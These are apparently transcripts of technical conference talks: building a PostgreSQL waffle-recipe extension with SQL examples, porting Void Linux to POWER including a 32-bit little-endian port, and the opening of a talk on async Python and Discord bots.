I decided that, should a conflict happen there, I will do an update, so that I can get the ID of the recipe whatever happens — if the recipe has already been inserted, maybe we want to update it, add more steps or more ingredients and things like that. So I need to use ON CONFLICT DO UPDATE to get the ID in any case. Nothing more I can say about this query, it's pretty standard: I use my processed_recipe temporary table to insert data inside the recipe table. Then I have another WITH list element where I will refine the ingredients. The ingredients are stored in an array in the JSON, so first I use jsonb_array_elements_text, which gives me text that I can process. And I found out that in my recipe, for the ingredients, I had parentheses with some details inside, and I decided that I wanted to get rid of those details, because I had no idea how they would fit into my data model. Maybe later I will make the data model accept these details, but for now I think it's not useful. So I use regexp_replace just to replace this kind of thing: everything between two parentheses, I replace with a simple space. Then I found out that Americans use fractions to say, for example, one and a half cups — they will use the fraction character ½. So I had to change that to have real decimal numbers, and I used a huge CASE WHEN expression here to replace any fraction I could find with a decimal number. That gives me a processed_ingredients WITH list element. Now that I have processed my ingredients, I will be able to use them to retrieve the name of the ingredient. Here you see the part that needs to be fixed: I remove data from the array I created before with the jsonb_array_elements_text function — I remove the first value and then the second value. That's why eggs are a problem: that's why the code says that eggs is not an ingredient but a unit. I use the same trick with ON CONFLICT, so that in any case I will have the ID and the name of the ingredient that was inserted into the ingredient table. I use another WITH list element where I will insert data into the ingredient_in_recipe table. For this table, I will need the ingredient ID, the recipe ID, the quantity, the unit and the yield; the recipe ID comes from the recipe WITH list element, so I found things easily. I still have my processed_ingredients WITH list element, where I have an array: here is the quantity, which I converted to decimal, then here is the unit, the second value in my array, and the yield can be found in the processed_recipe table. So nothing is really a problem — I just had to use this very long expression here to find the name of the ingredient I was inserting. And then I am able to insert data inside the steps. The last table is the step table; again, nothing very difficult, I have all that I need. I have the recipe ID, and I use here the jsonb_to_recordset function, which will give you rows. I use ROWS WITH ORDINALITY, because I need the ordinality: I need my steps to be in order, so that you can actually make the recipe. So I use this trick, ROWS ... WITH ORDINALITY — you can go into the PostgreSQL documentation to find out more about it — and then I use jsonb_to_recordset to get a set of columns from my jsonb. And that's all. As I say, it's long, but it's not that complex. It's long because we have to insert into four tables.
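A heavily condensed, hypothetical sketch of that single-statement load (the real query is around 110 lines); it reuses the table names from the earlier sketch, skips the regexp_replace/fraction clean-up, and the JSON keys are assumptions:

```sql
WITH new_recipe AS (
    INSERT INTO recipe (title, description)
    SELECT recipe ->> 'name', recipe ->> 'description'
      FROM processed_recipe
    ON CONFLICT (title) DO UPDATE
        SET description = EXCLUDED.description  -- harmless update so RETURNING also fires on conflict
    RETURNING recipe_id
),
new_ingredients AS (
    INSERT INTO ingredient (name)
    SELECT DISTINCT line                         -- the real code cleans this line up first
      FROM processed_recipe,
           jsonb_array_elements_text(recipe -> 'recipeIngredient') AS t(line)
    ON CONFLICT (name) DO UPDATE SET name = EXCLUDED.name
    RETURNING ingredient_id
)
INSERT INTO ingredient_in_recipe (recipe_id, ingredient_id)
SELECT r.recipe_id, i.ingredient_id
  FROM new_recipe r CROSS JOIN new_ingredients i
ON CONFLICT DO NOTHING;

-- Steps, inserted in document order thanks to WITH ORDINALITY.
-- (The talk uses jsonb_to_recordset; jsonb_array_elements is a close,
-- simpler relative used here to avoid a column definition list.)
INSERT INTO step (recipe_id, step_number, instruction)
SELECT r.recipe_id, s.n, s.step ->> 'text'
  FROM processed_recipe p
  JOIN recipe r ON r.title = p.recipe ->> 'name'
 CROSS JOIN LATERAL jsonb_array_elements(p.recipe -> 'recipeInstructions')
            WITH ORDINALITY AS s(step, n);
```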
So of course we have at least four queries inside one, but I also needed to process my ingredients, which were not in the format I wanted, so I had to change how the ingredients were formatted — and as you see, that's where I eventually found a bug. So that's where I will need to work a little more to make it better. Then we can display the recipe. First, we use a simple WITH list element to get the first recipe. In my case, I have only one stored, but who knows what my extension will become, so in case someday we have 1000 waffle recipes, I will only get one. And then on top of that I just join to get anything I need from the ingredients. And that's where I found out that I had a bug, because the name of one ingredient was a space. I found that sometimes you have a unit and sometimes there is no unit, so I need to fix that. I tried to work on it before FOSDEM, but I was not sure I'd be able to achieve that. And then you can display the recipe using the exact same WITH list element, but joining it on the step table, and you will find that you need only four steps to create waffles. That's very simple. If you put all that together, you have an extension. To create your extension you will need a file named after your extension, then two dashes, then the version number. I decided to go with very simple versioning: 1, 2, 3, 4 — nothing simpler than that. At the top of your SQL file, if you want to prevent anybody from running that SQL file directly in a psql session, you can add this header: the header will quit if the file is run in psql without using CREATE EXTENSION. And then it's time to create your repository. I use a Git repository because it's very useful; of course, that's not mandatory. But what's mandatory is to have a Makefile. Your Makefile should have your extension name, and it should list your files, as I did here. And then you will need a control file. The control file will have things like default_version, the comment, the module pathname, and so on. In my extension, I have only three variables to set to have a control file. With that, you should be able to use make install to install your extension. And then the extension is installed on your server — but that doesn't mean you can use it right away, because it's not installed in your databases; it's just installed on your Postgres server. How can I install my extension in a database? I created a database called leticia, my name, and then I used CREATE EXTENSION pg_waffles to create my extension. If I look at the schemas, I see that my pg_waffles schema has been created. If I look at my tables, I have my four tables: ingredient, ingredient_in_recipe, recipe and step. And if I look at my functions, I have my two functions, display_ingredients and display_recipe. These two functions use the exact same SQL code I gave you at the end of the previous part, just to display the ingredients and display the recipe. So now it's time to display the ingredients. How do you call a function in Postgres? You can do SELECT pg_waffles.display_ingredients(), or SELECT * FROM pg_waffles.display_ingredients(). And of course you find the same bug with eggs — that's totally normal, I did not have time to fix it between two slides. You can use the display_recipe function to display your recipe steps. So we did what we wanted: we are able to use Postgres to explain how to bake waffles. That's very great. So now we want the world to know.
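For reference, a hypothetical skeleton of the pieces described above — the guard header is the standard one from the PostgreSQL documentation, the rest is just a sketch:

```sql
-- pg_waffles--1.sql  (extension_name--version.sql, as described above)
-- Standard guard: abort if someone runs the file directly in psql
-- instead of loading it through CREATE EXTENSION.
\echo Use "CREATE EXTENSION pg_waffles" to load this file. \quit

-- ... schema, tables and the display_ingredients()/display_recipe()
-- functions go here ...
```

And once the Makefile, control file and `make install` have put the files in place, testing could look like this:

```sql
CREATE EXTENSION pg_waffles;
SELECT * FROM pg_waffles.display_ingredients();
SELECT * FROM pg_waffles.display_recipe();
DROP EXTENSION pg_waffles;   -- removes every object the extension created
```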
And just a disclaimer here: don't install pg_waffles on your production servers. I'm not very sure that's a good idea — it's actually not useful in production, so please don't do that. So, to register on PGXN, it's very simple. First, you need to create an account; the account will need to be validated by a human, so it won't happen in the next two minutes, but these guys are very, very fast — you won't wait more than one hour. After that, you will need to create a META.json file that explains how your extension is built, the files it uses, where you can find the source code, and things like that. You will find a wonderful how-to on the PGXN website. After that, you will be able to upload your extension. You should find that your extension is successfully uploaded and has its own web page on PGXN, like I did for pg_waffles. So now, I think it's time to taste my waffles. I hope it's a success. It seems like a success, actually — if you see this, that's what I call a success. The source code is available under my GitLab account, and I'd like to thank Rick Morris for the idea of baking waffles with Postgres. I'm available if you have any question regarding extensions with Postgres, or regarding Postgres in general. Thank you for watching until the end. Have a nice day.
FOSDEM would not be FOSDEM without waffles... What if we could use Postgres to make waffles? During this talk we will use the excuse of FOSDEM and Brussels to create an extension that will look for the best waffle recipe and use Postgres to display it. During this journey, on top of making delicious waffles, we will: - understand what an extension is - find the steps needed to create an extension - make this work all together - install our extension - display the best waffle recipe.
10.5446/53293 (DOI)
Hello everyone, and welcome to my presentation on Void Linux. I'll be talking about the progress of Void Linux on the POWER architecture in the last year and a half or so. But first, who am I? I'm a programmer from the Czech Republic and I've been involved in open source since 2007 or so. I have contributed to a fair amount of projects over time. One big one is the Enlightenment Foundation Libraries, which is the set of libraries intended for the Enlightenment desktop environment. I've also messed around with game development, programming language compilers and so on. But these days I'm the primary maintainer for the POWER architecture port in Void, and a few other things in Void. So what is Void? I gave a talk previously at the OpenPOWER Summit EU 2019 in Lyon, France, but there are probably many of you who haven't seen that talk, so I'll describe it in short. It's an independent Linux distribution with a custom package manager; it was originally created as a testbed for this package manager. It has a focus on simplicity, but it's not like these minimalist distributions — it tries to strike a balance between the two things. We have a fair amount of packages and we have similar functionality to other big distributions. In order to stay simple, it's rolling release, so we don't have to deal with release management. We mostly ship stable software, though — it doesn't really ship lots of bleeding edge stuff; we make sure that everything stays stable. It's binary based, but there's a system called xbps-src, which is similar to a BSD ports-like system, which you can use to build your software packages from source. Basically every package which is present in the repo is buildable from source using xbps-src; it's sort of a monorepo kind of thing with all the package recipes. Of course, besides POWER, which is supported at this point, it's on x86 where it started, it's on ARM and AArch64 of course, and we also have build profiles for MIPS, but we do not ship any packages for MIPS. The intention is that there is a low barrier of entry, with a very open, inclusive and informal community, so if you want to contribute, it's easy for you to get started. So how is Void on POWER different from other distributions? Well, for one, we have a particular focus on desktops and workstations, not servers. Most distros are focused on servers; we feel like there's enough of that stuff, and Void on POWER was originally created to provide a desktop operating system for me — a sort of selfish reason. We support both little and big endian, with little endian having the standard requirement of POWER8 or newer CPUs; big endian runs on all the old Mac hardware and so on. What's different from other big endian distributions? We use the modern ELFv2 ABI on glibc as well, which is something other distros don't do. It was sort of an obvious decision for us, because it was a fresh port and we didn't want to deal with a 30-year-old ABI, so we just went with the modern one immediately. Of course, there's also the page size in the kernel: we use 4K pages by default, while most distributions use 64K pages by default. 4K pages is what's also used by x86 and most other architectures, so it's more compatible with different software and hardware. We also have wider desktop software support — this includes things like the Chromium browser and Electron applications and so on. Now let's go over the quick history of Void on POWER, because while I described this in detail at the OpenPOWER Summit, many of you are probably not in sync with this.
I started the project in late 2018. This was because I bought a Talos II Lite to use as my primary workstation. I wanted a desktop operating system for it; I used Ubuntu for a bit and I was not very happy with it. So I just did an initial port — it was done in like three days and I had a graphical environment ready. Over the coming months I kept expanding the package coverage, and eventually during 2019 we got to complete coverage on little endian. There were also big endian ports from the start, for 64-bit musl libc and for 32-bit glibc and musl libc. There was no 64-bit glibc big endian port, because of the ABI situation — we weren't aware at this point that it actually just works. So this port came later, in April. During late 2019 there was complete coverage on all repos, I gave my OpenPOWER Summit EU talk, and in November I got a commit bit in the upstream repos. So from that point all changes go directly into Void, without lingering in my custom repo for too long. But this talk is not about that — it's about what has happened since that point. So this screenshot: it's Visual Studio Code, an application which lots of people have been requesting, running on Void with ppc64le and musl. As you can see in the corner it's all printed there, and it works fine. But first, the Java bootstrap. That's one big thing we actually did, and it was kind of a pain. We have OpenJDK 8 and 11 in the repos, and since you need OpenJDK to build OpenJDK — and you need a version which is one version older — we had to eventually reintroduce GCC 6, which shipped GCJ, the GNU Java compiler, now deprecated, but in GCC 6 it was still present. We used this to bootstrap OpenJDK 7, which is a bootstrap-only package — it's not meant to be used by people. JDK 7 is then used to bootstrap 8, and then we have bootstrap packages for 9 and 10, so we can eventually bootstrap 11. This is a fairly fast process on ppc64le, because there's a JIT in there and it takes maybe 10 minutes or so to bootstrap one OpenJDK. On 32-bit PPC this is very slow, because there's no JIT support, only the interpreter, and instead of 10 minutes it takes like four hours — so that's kind of a pain, but oh well. Go. Go is a language which is fairly widely used for specific kinds of software, and we have a bit of a problem there, because Google, who maintain the toolchain, only support ppc64le. Well, technically speaking they do have BE also, but their BE port uses, well, an ABI we do not use, and it also needs POWER8, which would be a problem by itself, because we make sure that all software in the repo runs on all hardware we actually support. There's gccgo, but gccgo is unreliable. For some reason it hangs — well, we do know the reason: there's some bug in the variable tracking code which results in gccgo entering an infinite loop when you try to compile Go with it. So since we cannot use this to bootstrap, we use the official binaries to bootstrap. These official binaries are provided for every architecture; they are not provided for musl libc, but for musl libc we deal with it by using gcompat. Since the Go compiler is written in itself, it doesn't actually use a lot of libc at all, so gcompat can actually run it reliably, and we can bootstrap with the official binaries pretty easily. BE support of course is missing completely — we don't have it. Haskell.
Haskell was also fun, under some definitions of fun. We use self-built binary snapshots to bootstrap the compiler. This included musl up to this point, because recently I figured out how to cross compile a bootstrap binary distribution of GHC, which can then be used to compile the actual distribution in a native environment. Big endian is missing for now, because of some bugs in the compiler; we will try to introduce it for 8.10 — the patches for the future big endian introduction are actually ready. Other languages: since recently we have greater support for Common Lisp, as SBCL is finally in the repos, but for now only on little endian — we need to test big endian a bit better. It's bootstrapped with ECL, which is a portable Common Lisp compiler that works on every platform. We are also preparing an update to CLISP, which hasn't seen a release since 2010, but there's active version control, so we'll make a snapshot from there. There are also things like D and Zig and some others which are currently still missing; they don't have anything depending on them, so we haven't paid much attention to those yet. LibreSSL performance. Void uses LibreSSL instead of OpenSSL at this point. LibreSSL is the fork of OpenSSL 1.0 made by the OpenBSD project, with the intention of having greater security. The problem is it only has assembly files for x86 and some 32-bit ARM. This results in performance which is much inferior to OpenSSL, and of course it also results in a lack of hardware crypto support on ppc64le and on AArch64. So I made a stopgap solution by importing those assembly bits from OpenSSL upstream; this is now present on my GitHub and it's shipping in Void. It has up to a 20 times performance increase in things where hardware crypto can be used. This is especially visible, for example, over SSH: if you use SSHFS, you can use this to increase your throughput from 18 MB per second or so to like 500 MB per second, so that's a big difference. Chromium: upstream does not support ppc64le, but there are downstream patches available, and since Chromium 84 we've been shipping these downstream patches. It works quite well. It's currently the only browser engine which has JIT support in the distro — and in any distro — and it works on musl as well. It's a fairly large patch, and Google has been rejecting most of it for a while now, so there's a chance we'll have to ship it downstream forever, but that's life I guess. Related to this, we now have support for Electron, which is a framework for applications, so you can write applications in HTML5 and so on. It uses Chromium — it's basically a version of Chromium. I don't use it, but people have been requesting different applications like Visual Studio Code and Element. These do work. They work because we have a system-wide Electron. There are some funny build system workarounds for these applications, because the Electron build system from Node.js tries to download a binary snapshot of Electron, and it doesn't know about the architecture, so it fails. What we do is just enforce the x86_64 architecture — make it pretend it's x86 — so it will download its binary snapshot, which obviously doesn't work, but in the end it will be using the system-wide one anyway, and it's pure JS anyway, so it doesn't make any difference. It's obviously only on LE, just like Chromium itself. I tried patching things for big endian before, and it doubled the patch and it never worked quite right, so I eventually gave up — it was too much of a pain to do downstream. Musl? That works.
We had musl support previously, so I just had to add a small patch adding the PowerPC musl-specific things. AMD GPUs. There's this problem called the AMDGPU DC, or display core. It's in the kernel and it has a very haphazard usage of hardware floating point, which means, for one, it's not portable. At some point Raptor Computing Systems added some code to make it work with these new Navi cards, but this was never backported to older kernels, so we backported it ourselves, down to 5.4. Since 5.10 there's apparently a dependency on page size, which is kind of bad, but it still works for us because we have 4K pages. Other distros apparently have issues with this, or at least that's what I've been told: they have 64K pages and amdgpu doesn't work with this. There was also a big rework of cross toolchains recently. There was this issue that we had many different cross toolchains — the list of targets grew a lot recently. We needed to deal with this because the cross toolchain build recipes were duplicating lots of code, so I introduced a common, what we call, build style for cross toolchains. Most of the code is in the build style, and now each cross toolchain is only 50 or so lines defining the actual toolchain-specific things. As some extra goodies which I introduced while cleaning it up, we now have glibc cross toolchains on musl hosts, which was not possible before, so we have much expanded support for this now. The configure arguments and so on are unified for all of this stuff now, so that's better also, and of course no more dirty masterdir — the masterdir is a sort of build container used by xbps-src. Previously the intermediate build artifacts — because you need to build an initial GCC without libc first, then you need to build libc, and then you need to build the final GCC — were messing up the container. We now deal with this by just restricting everything to temporary directories. Infrastructure status: this is a screenshot from our build server. It's currently still a Talos II Lite with 18 cores and 128 gigs of RAM, and it runs in my bedroom — it's actually next to me right now. This is not ideal, of course, but I don't have a better place to put it. Big endian builds run in a VM — thanks to KVM you can run cross-endian VMs and there's no performance decrease. The little endian builds run on bare metal, and the primary package mirror, where people actually download stuff, is on a separate server in Chicago in the USA. The mirror has a 10G network and two terabytes of storage, so we cannot really compete with this. I do have a public IP here, but I don't think anybody would want to download stuff from me. There are several other mirrors provided by the community. We could certainly use faster build hardware, and we could certainly use hardware which is not in my bedroom. As for the primary mirror: after we have some better build machine which is actually colocated in a real server place, we should migrate the primary mirror to that machine, so packages are available immediately after the build and we don't have to upload batches to a server on the other side of the world. We also need to do more build automation — this is work in progress; I'm working on some software to actually improve the infrastructure. Now the main thing: 32-bit little endian. This is a screenshot from a chroot userland which is 32-bit little endian — you can see it's running. So first, why? Well, why not? It officially does not exist — but only officially.
The thing is, you can run 32-bit binaries on 64-bit POWER, because 64-bit is just an extension of the original PowerPC, and you can certainly run 32-bit binaries natively on 64-bit CPUs. This is on big endian, though. On little endian this is actually the same, because, well, that makes sense. In practice this therefore just works. The bring-up process was fairly basic, made easy by xbps-src — it was similar to the other architectures we have. But there is no native support for 32-bit little endian in the Linux kernel itself, so we cannot actually boot this on real hardware. It does work as a chroot on a 64-bit kernel through the compatibility stuff, but not out of the box, so there are some fixes needed for the kernel. So first, we had to fix 32-bit compatibility in the kernel. The first issue was that signal handlers were clearing the little endian bit in the machine state register. This was fixed with a trivial patch. Also, 32-bit VDSOs were disabled by default — that is just a build system change. Some VDSOs are broken on little endian; we had to disable those. Coincidentally, we found that the PowerPC 601 had these same VDSOs broken — we are not aware of any relationship between these, we just had to extend the disablement. System calls with 64-bit arguments were also an issue, because the high 32 bits and the low 32 bits were passed in the wrong order. There are some wrappers which do the passing, so we had to fix the wrappers. All of these are very trivial patches, and things do run without them, but they also crash at some random points — usually the obvious ones, like when entering a signal handler or when exiting. After patching there are no more known issues — at least we are not aware of any. Fixes for this are being upstreamed into the kernel, except the VDSO fixes, which will be fixed by just moving the VDSO code to C. That is a work in progress by other people in current mainline, so at some point it will just get fixed. There will be, or there are, backports to all Void kernels that run on little endian, that is, 4.19 and higher. Now for bootstrapping the 32-bit little endian port. First, we had to create built-in cross profiles for xbps-src. These profiles define the target triplet and some other specifics of the compiler. Then we had to create cross toolchains for the 32-bit LE targets. That was fairly easy — we just had to copy the big endian ones and adjust the triplet and so on. Some minor patching was needed in glibc and in musl: in glibc just some warning fixes; in musl we had to adjust the dynamic linker name so it matches GCC properly. Adjustments around xbps-src were needed, obviously, just for where it looks for architecture-specific code — usually just trivial adjustments. After this we could cross compile a base chroot. This is basically a minimal set of packages needed to assemble the container in which everything is built. Any errors had to be fixed along the way, and there were relatively few, very trivial ones. After that we had a basic set of packages which we could use to binary-bootstrap a build container. Then we could rebuild every package of the build container natively, without cross compilation. Then we could build the other base metapackages, like base-voidstrap and so on, which add more software to the chroot, and after that more software in general can be built — all sorts of different stuff in the repo. Of course, when errors come up, fix those. Usually there are not a lot of them.
We did run into some issues, like VSX code in, say, an image decoder assuming that little endian means POWER8. For now we compile for POWER8, so this is not a problem for now, but eventually these things will have to be patched. At this point I could probably function on a 32-bit userland if I compiled enough of the userland. But there are some buts. There's no official support in glibc — that means the dynamic linker name is shared with big endian, and the symbol versions are also shared with big endian. This is not good for having an official port, because every architecture has to have a unique dynamic linker, and fresh symbol versions also. So I'm going to propose an official port later, and once it's actually upstream I will rebuild the whole experimental repo from scratch. The ABI is the same as big endian, and this is fine, probably — the ABI is well defined for both endians, and on musl it pretty much just works as it is. Even the dynamic linker name is stable, and since musl doesn't do symbol versioning, there's nothing to worry about. Of course, we did this because we could, but another big thing was easier emulation of 32-bit x86 binaries. There's a project called Box86 — I'll get to it later — which we will be previewing. Of course, eventually it could be possible to actually port Linux to G3s and G4s, since those CPUs do support little endian mode; it would just need to actually work. Or we could take the easier path, which I was made aware of, and just use a BE Linux kernel, then use the switch-endian syscall and swizzle the syscall data for userland. Apparently this should work — I'm not sure how it would work yet, but I was told it would work. For now it's strictly POWER8-plus, though, so we only run it as a compatibility userland on our POWER9 workstations and so on. There are some obstacles. For one, LLVM support, which is needed for Mesa and some other things. Fortunately this was recently upstreamed by the FreeBSD folks, who needed it for their loader. We backported the patches to Void. It came in handy, because I was just about to start working on porting LLVM when I found that there were patches available already, so this saved a lot of work for me. We also need Rust support, which is currently blocking a fair amount of the userland, mainly because of things like librsvg, which is depended on by GTK and lots of other things. There are some work-in-progress patches available which I wrote for Rust, but it doesn't work yet — cargo crashes and so on. We need to figure all of this out. Proper glibc support needs to be made, and we could also use the opportunity to improve the ABI perhaps, but we are not yet sure about this. One thing we definitely do want to do is use a 64-bit long double type. This will allow us to ditch the weird IBM 128-bit floating point type, which is basically composed of two standard 64-bit ones. glibc is moving on from this to real 128-bit floating point for 64-bit, but we cannot use this on 32-bit, because we do not depend on VSX being present, and these new floats require vector registers to pass them around. We also need to choose a unique dynamic linker name and fresh symbol versions for the new port. I'm kind of thinking we could use this to fix up our 32-bit big endian ports as well — I mean, we could at least ditch IBM long double there as well — but I'm not yet sure what the best technical approach to this would be, to ideally preserve compatibility with older stuff and ideally also make it upstreamable.
As for results, there are testing repos now available, and it can fully compile itself. A portion of the repo is packaged — by portion I mean some 8% or so. This might not seem like much, but lots of core things are already available, and lots of other things could already be built; we just haven't built them yet. There's the core userland, there are development tools like the compilers, LLVM, there's Mesa, there's SDL, and of course there's an initial port of Box86. What is Box86? Well, Box86 is a Linux x86 userspace emulator developed for ARM devices. It has nothing to do with PowerPC, but we wanted to use it to emulate some old games for which we only have x86 binary versions on our POWER machines. The problem is this needs a 32-bit little endian host — and you can probably see what I'm getting at: this is why we needed a 32-bit little endian port. So there's now an initial PowerPC port done by our community. It can run glxgears, and I also got it to run Unreal Tournament — the old one from 1999. It works, but it's fairly slow; sometimes it's playable, sometimes it's not. There's no dynamic recompiler for PowerPC yet in Box86, so it's purely interpreted. Of course, this is still faster than the likes of QEMU, because unlike QEMU it actually runs lots of code natively. How Box86 works is that it wraps native system libraries for different functionality — things like SDL, image libraries, audio libraries, OpenGL and so on — which means basically most things which are provided by the system do not run emulated. They use the native versions, and all the emulated code is the actual game only. Now for the future. This is a screenshot from our statistics page. You can see the coverage: for LE it's very high, for BE it's slightly lower, and for 32-bit little endian it's fairly small for now. One thing is infrastructure. I would like to get things made official at some point — mainly, the ppc64le port should become an official port at some point. It should be easy, because that port is stable and there's nothing much to change in it. As for BE, this has some issues, because of the ABI situation, which we need to clarify with upstream first. 32-bit has some issues also. There's also the issue that some server software in the official Void infrastructure is written in Go, so it's not portable to these. This can be worked around differently, but yeah. The ELFv2 BE ABI: we will need official support in glibc for this, and right now things mostly work by accident. That means the dynamic linker name and symbol versions are shared with the 64-bit LE port. Upstream did say they wouldn't be against this, but we would need to formalize the ABI first. IBM thinks the VSX requirement is a part of the ABI; we do not entirely agree, but we are still going to solve this, so we are going to formalize an ELFv2 legacy-compatible ABI. This legacy-compatible ABI will be just an extension of the current ABI: it will remove the requirements for VSX and VMX, and it will also switch to 64-bit long doubles instead of the 128-bit IBM floating point. It will come during this year. It will be shared by glibc, and it will be shared by musl and FreeBSD — musl and FreeBSD already implement it the way I intend to specify it, so basically there are existing compliant implementations before the specification exists, which is kind of funny, but oh well. There will be other things. We will have to upstream as many patches as possible.
We will want to write a new installer for our live media, and also work on enablement of new software, as well as working with the upstreams of different software projects which do not have POWER supported, to add support for POWER. A lot of work has been done in this year and a half, and there's still plenty more to be done. If you want to talk with us or work with us, you can join our IRC channel on Freenode, and if you want to see some detailed statistics and so on, you can visit our website. For now, that's the end of it — well, I will show you some cool things — but thanks for listening, and there will be a live Q&A session after this. Okay, so I will show you some cool stuff, I guess, since we still have some time. Here I have a chroot of the 32-bit little endian Void Linux port. It's fairly minimal and doesn't have a lot of software in it, but it does have Box86 in it. As you can see, it has a build of CMake and it has a build of the dependencies for Box86, so we can try compiling it — and since this is slow, we can try compiling it faster. And it's linking, I believe. Well, maybe not yet; this will take a bit. Well, for now we have some other stuff. We have a build of glxgears, which we are now going to run. It spawned on a different screen, so let's move it just over here. As you can see, it's running at the native refresh rate of the screen — I mean, 60 FPS — it can do the 60 FPS. Obviously it's mostly an OpenGL application and very simple, so even emulated it will run at a decent frame rate. But I have a cooler thing, and that's Unreal Tournament. This will take a bit to start up, because there's a screen recording and so on running, so yeah. And here it is. You can see this is choppy — it's usually faster, but there's other stuff loading the CPU right now. You can see at some points it's also fairly smooth; it depends on how far into the scene you can see. Anyway, here's the menu; we can start a practice session. I believe this is also an unoptimized build of Box86, so this will also run faster if we try to... You see, now it's smooth if there's no distance visibility, but once you can actually see far, it just blows up. But yeah, it does work, and I think that's good enough for now. So I think that's the end, and there will be a live Q&A session after this, so feel free to stop by and ask some questions. Okay, we're going to go live in a few seconds. Hi, Daniel. So, are you going to answer some of the questions, or should I read them out? So... there were some questions about how the builds were done; I don't know if you could elaborate on that a little. I think you're still muted. Hold on, now you should be able to hear me. Yes, now it's better. Okay, good. So let's start with the first questions, I guess. Yes. So what exactly were you asking regarding the builds? So there were some questions about... you mentioned that you have a scratchpad SSD going through virtio. Oh yeah, like this. Yeah, basically, the first thing we did was just set up a big endian VM and use a qcow2 disk to store the operating system, and then, in order to share the repo directory with the VM so it can actually write packages into the repo, we just exposed it over virtio-9p. Of course this has problems, because the throughput of the qcow2 storage is not as great as just a native SSD, and it was actually slowing down the builds.
So we got around this by just buying a new SSD separately, splitting it in half and exposing one half — one partition — as a block device directly to the VM, and that way it can basically run as fast as native. It does run as fast as native; so far it works very well. Okay, then there were some questions around mbrola, which is broken. I don't know if you could comment on that. I don't see that here, actually. Okay, so mbrola is broken on little endian, and apparently it worked on big endian. Okay, that's interesting — we've never run into this, so I haven't really looked into it, so I don't think I can answer this, but if you can point it out to me in chat, I can take a look afterwards. Yeah, I haven't actually had that error, or that issue, on our builds either, so that's why I was just asking — maybe you had that experience — but we will see if T-platin can comment more on that in chat. Okay, I see some questions in the chat, so I'll reply to these directly. I see: with Box86, would I be able to run Unreal Engine for x86 on POWER? No, because it's mostly suited for old games. If you run new stuff on this, it will run very slowly. I tried to run the well-known Linux game Xonotic on Box86, just as an experiment to see how slow it would be — it's not a particularly demanding game, it works on my testing G5 — but in the Box86 emulator it runs at, well, it updates the frame every five seconds or so. The menu runs fairly fast, but once you get in game it slows to a crawl. I see a second question: what package manager is Void most similar to? Well, it's kind of its own thing, really. It uses several binaries — xbps-install, xbps-remove, xbps-query and so on — and then it uses regular positional and optional arguments passed to those. So, to upgrade your system you run xbps-install, then you pass capital S and lowercase u: one is to sync the repo indexes, one is to upgrade. If you want to install a package you just run xbps-install and your package name. So it's not particularly similar to anything else — it's like a hybrid between most things. As for Qt5 packages cross-compiled to aarch64: well, Qt5 packages can be cross compiled for aarch64, I don't think there are any issues with this, because we do cross compile for aarch64 in Void — I mean, our ARM ports are fully cross compiled, and Qt5 is definitely present there. What's problematic is Qt5 WebEngine, which can be cross compiled, but the problem is it needs to match the word size of the host and target. So if you want to cross compile for a 64-bit target you need to cross compile from a 64-bit host, and if you want to cross compile for 32-bit you also need a 32-bit host. This is a bit of a problem for us, because we cannot cross compile Qt5 WebEngine for 32-bit ARM, since we cross compile from a 64-bit host. We could deal with this by using a 32-bit build container, but this is not ideal. And what's the performance of a 32-bit userland running on POWER8 or POWER9 versus a 64-bit one? Well, I haven't really done any in-depth benchmarking, but it seems to be fairly close — I haven't noticed any actual difference in things like compilation times; things mostly compile about as fast in a 32-bit chroot and on you
Void's POWER architecture port has been progressing steadily since the last OpenPOWER Summit EU talk in 2019. Recently we introduced a completely new 32-bit little endian port, which will be a big part of this talk's focus, and is a first among Linux distributions. I will not stay there though - we have more to cover, including stuff like Chromium and Electron applications in repos, faster POWER crypto in LibreSSL, reworked crosstoolchains, stable support for newest AMD GPUs, and our big endian variants are also receiving attention, including properly clearing up the 64-bit ABI situation. Void Linux is an independent, rolling release, general purpose Linux distribution (leaning towards desktop/workstation focus) originally created in 2008 on the x86_64 architecture as a testbed for its own XBPS package manager. Over time, it has received a variety of ports, including 32-bit and 64-bit ARM, MIPS, and eventually POWER and PowerPC. It has variants for 64 and 32 bits, little and big endian, and glibc and musl C standard libraries. Most recently it has received an experimental 32-bit little endian port, which is a first among Linux distributions. I will be focusing partially on the new port, and partially on other news in the distribution since my last talk I gave at OpenPOWER Summit EU 2019. I will explain our goals with the new port, as well as our plans. Additionally, the future of the distribution will also be covered, as well as currently remaining issues and blockers that prevent us from achieving that.
10.5446/53295 (DOI)
Hey, hello, I'm Chek and welcome to my talk, don't be afraid of async. This is about my journey when I started to use async and actually how I learned that async is actually very helpful in some application and why you should use it. Also, I came across some of the questions that I have about async. Once you like step into this async kind of style, some of the rules that you learned in your programming experience in the sync world may not apply or there's some kind of traps there that maybe you have to overcome. So I came across that with you all together. So here are my contact information here. You can see that you can contact me on Twitter if you want to discuss further. Also, the slides is available at the link there. So it's basically under my account on Slice.com. You can check that out. Okay, so I would give you a brief introduction of myself. I'm Chek. I love open source. I've involved in a field open source project in the past and right now I'm very lucky to be working for Terminus DB, which is an open source graph database. So if you're interested in graph database and well, it's open source. So please feel free to discuss with me. Also, I love organizing Python events because it gives me joy, it gives me opportunity to learn and met awesome people. So I've been organizing some sprints before the pandemic happened and also I'm organizing your Python this year. It's going to be online again. Python Global, I help organizing. The first Python Global last year is tons of fun and we may have it this year, but it's not sure yet. So please stay tuned. Also, there's a pyjamas con, which is a online 24 hours wearing your pyjamas, having fun conference that is happening at the end of the year. So also I streamed on Twitch. So I'm just starting back into my streaming schedule for this year. Usually I would have some kind of exploration or tutorial section on Sunday and some other things during the week. So please follow me and make sure that you get notification when I go online. So first of all, what is Discord? So I'm sure that some of you are already using it because of the conference and what's called is a very good tool to be able to chat with people online, especially during this time that in person contact should be avoided because of the virus. So yeah, so it's very good. It's kind of like Slack plus Zoom. So you could actually chat with people. It's kind of like a chat room kind of thing. But at the same time, you can have voice call with people, which is kind of like Zoom. We use that work actually. We loved it. Also, well, it's like this setup here. There are lots of conference using Discord. Well, the first conference, not the first conference, but like EuroPython that I organized last year is actually using Discord. So actually, this is how I started to write the Discord board. Okay, so it's amazing tool. The good thing about it that I like is that Discord is very developer friendly, I would say, because a lot of the users are actually technical people. They are mostly, you know, they will be interested in gaming. They are also interested in programming as well. So they provide this API for the users to create boards that could automate a lot of things, that could help them to actually manage the community that they created on Discord. So for example, I see like all different kinds of board with Discord, right? You can actually go to the marketplace and check it out. 
